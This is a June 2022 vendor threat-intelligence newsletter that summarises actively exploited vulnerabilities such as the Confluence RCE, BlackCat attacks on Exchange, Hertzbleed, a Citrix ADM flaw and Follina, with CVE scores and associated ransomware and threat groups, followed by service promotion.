CSW Weekly Threat Intelligence
Posted on Jun 27, 2022 | By Pavithra Shankar
CSW weekly threat intelligence edition brings to you early warnings about critical vulnerabilities that could potentially be weaponized and prove dangerous to your organization and its assets.
Top Critical Cyber Threats of the Week
-
Confluence servers hacked to deploy AvosLocker, Cerber2021 ransomware
-
New Hertzbleed: A Side-Channel Vulnerability Attack Affects Intel and AMD CPUs
-
CISA Added Follina to its Known Exploited Vulnerability to Catalog
Confluence Servers Hacked to Deploy AvosLocker, Cerber2021 ransomware
Ransomware groups are exploiting an already patched RCE vulnerability in Atlassian Confluence Server and Data Center. In addition, several new botnets are also actively abusing it for initial access to target networks. A week ago, attackers leveraged this CVE-2022-26134 vulnerability for installing web shells to achieve remote code execution.
Threat Associated CVEs: CVE-2022-26134
CVSS Score: 9.8
Vendor & Product: Confluence Server 7.18.0 version and Confluence Server and Data Center 7.4.0 and higher
Exploit Type: RCE Vulnerability
CWE: CWE-74
Ransomware Associations: Cerber, Avoslocker
APT Groups: NA
Malware: Linux Botnets
Early Warning: Our AI and ML models have given a Maximum rating for this vulnerability indicating a high risk of exploitation by attackers.
BlackCat ransomware Targets Microsoft Exchange servers
Microsoft warns that one cybercrime gang exploited an unpatched Exchange server in order to deploy the notorious BlackCat/ALPHV ransomware on a target organization. BlackCat affiliates reportedly used Exchange server CVE-2021-31207 to gain access to the server and install a web shell to access it remotely. While Microsoft didn't mention any Exchange vulnerability used for initial access, it links to a security advisory from March 2021 with guidance on investigating and mitigating ProxyLogon attacks.
Considering this, organizations should patch the below-listed BlackCat-associated CVEs, including the ProxyLogon vulnerabilities.
Threat Associated CVEs: CVE-2016-0099, CVE-2019-7481, CVE-2021-31207, and CVE-2021-26855.
Early Warning: Unusual hacker chat discussions about this vulnerability have increased its exploitability rating.
|
Threat Associated CVEs |
CVSS Score |
Vendor & Product |
Exploit Type |
CWE ID |
Ransomware Associations |
APT Groups |
|
CVE-2016-0099 |
7.8 |
Windows SMB |
PE |
CWE-264 |
BlackCat |
NA |
|
CVE-2019-7481 |
7.5 |
Microsoft Exchange Server |
- |
CWE-89 |
BlackCat|HelloKitty |
- |
|
CVE-2021-31207 |
7.2 |
Microsoft Exchange Server |
PE, RCE, WebApp |
- |
BlackByte|Cuba|Babuk|LockFile| Conti|Hive|AvosLocker|Karma|BlackCat |
ChamelGang|TR |
|
CVE-2021-26855 |
9.8 |
Microsoft Exchange Server |
PE, RCE, WebApp |
- |
Cuba|DearCry|EpsilonRed| Conti|AvosLocker|Black Kingdom |
BRONZE BUTLER|HAFNIUM| FamousSparrow|Mikroceen| Threat Group-3390| Websiic|WinntiGroup| Calypso|Mustang Panda| APT29| Tonto Team|TR |
New Hertzbleed: A Side-Channel Vulnerability Attack Affects Intel And AMD CPUs
A new security vulnerability discovered by researchers from the University of Texas called Hertzbleed could allow attackers to steal cryptographic keys from all modern Intel and Advanced Micro Devices CPUs. The researchers have dubbed this attack as Hertzbleed because it uses the insights into Dynamic voltage and frequency scaling (DVFS) to expose or bleed out data that's expected to remain private. The vulnerability is tracked as CVE-2022-24436 for Intel chips and CVE-2022-23823 for AMD CPUs. There is no patch available at this time.
Threat Associated CVEs: CVE-2022-24436 and CVE-2022-23823
|
Threat Associated CVEs |
CVSS Score |
Vendor & Product |
Exploit Type |
CWE ID |
Ransomware Associations |
APT Groups |
|
CVE-2022-24436 |
6.3 |
Intel |
Information Disclosure |
- |
- |
- |
|
CVE-2022-23823 |
- |
AMD |
Information Disclosure |
- |
- |
- |
Critical Citrix Bug (CVE-2022-27511) Impacts All ADM Servers, Agents
Citrix is advising users of its Application Delivery Management (ADM) solutions to update their systems against a newly discovered vulnerability. Tracked as CVE-2022-27511, this vulnerability could allow system corruption leading to the admin password being reset after reboot. It affects all supported versions of the Citrix ADM server and Citrix ADM agent.
Threat Associated CVEs: CVE-2022-27511
CVSS Score: 8.1
Vendor & Product: All supported versions of Citrix ADM server and Citrix ADM agent
Exploit Type: NA
CWE: CWE-284
Ransomware Associations: NA
APT Groups: NA
Malware: NA
Early Warning: Our AI and ML models predict a high risk of exploitation by attackers.
CISA Added Follina to its Known Exploited Vulnerability to Catalog
CISA added the Microsoft Follina zero day after a patch was released on Patch Tuesday. This Follina vulnerability is identified as CVE-2022-30190, which is currently used in multiple attacks to execute malicious PowerShell commands via the Microsoft Diagnostic Tool (MSDT) when opening or previewing specially crafted Office documents.
This vulnerability is being targeted by threat actors such as TA413, QBot, and Sandworm, and most notably, there were multiple PoC available publicly even before the patch.
To know more about our Follina analysis, click here.
CVSS Score: 7.8
Vendor & Product: All current supported Windows versions
Exploit Type: RCE Vulnerability
CWE: NVD-CWE-noinfo
Ransomware Associations: NA
APT Groups: TA413, APT28, and TA570
Malware: QBot, Sandworm
Early Warning: Our AI and ML models have given a maximum rating for this vulnerability indicating a high risk of exploitation by attackers.
CSW is on a mission to fix the biggest gap in the cybersecurity industry!
Threat Intelligence will no longer be responding to security incidents. We are breaking the wheel to provide you with an early warning system based on our AI and ML capabilities, hacker chats, and attacker behavior. Leverage our expertise and manage your threats on a continuous basis to stay safe from attackers.
Talk to Us | Schedule a Consultation
Our Services
Vulnerability Management | Penetration Testing
Attack Surface Management | Cloud Security
Never miss a patch or an update with CSW's Patch Watch Newsletter. Subscribe now!
